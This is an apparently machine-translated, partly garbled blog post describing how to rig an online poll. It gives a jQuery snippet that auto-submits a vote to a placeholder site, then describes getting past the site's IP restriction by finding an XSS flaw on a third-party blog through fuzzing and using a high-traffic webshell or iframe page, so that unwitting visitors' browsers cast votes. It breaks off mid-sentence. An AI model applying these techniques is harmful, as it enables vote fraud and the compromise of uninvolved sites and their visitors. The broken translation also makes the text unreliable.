A member of the team sent a voting address, which required a vote from a website named XX. The ip address was restricted and the post packet was displayed.
Find a large-volume shell post data.
Js Code
<Script type = "text/javascript" src = "http://code.jquery.com/jquery-latest.js"> </script>
2 <script type = "text/javascript">
3 $ (document). ready (function (e ){
4 var timestamp = (new Date (). valueOf ();
5 $. post ("http://www.xxx.com/vote.json? T = "+ timestamp, {itemId: 10072 });
6 });
Check that firebug post has been successful.
It is estimated that the road has come. I have to submit it from this site. It seems that I have to seek the xss cooperation on this site and start to pick it up. I saw a blog with rich texts. After some fuzz, I found an image-type xss.
Find a large-traffic webshell Iframe page, but the sky is dark, then the first evil bib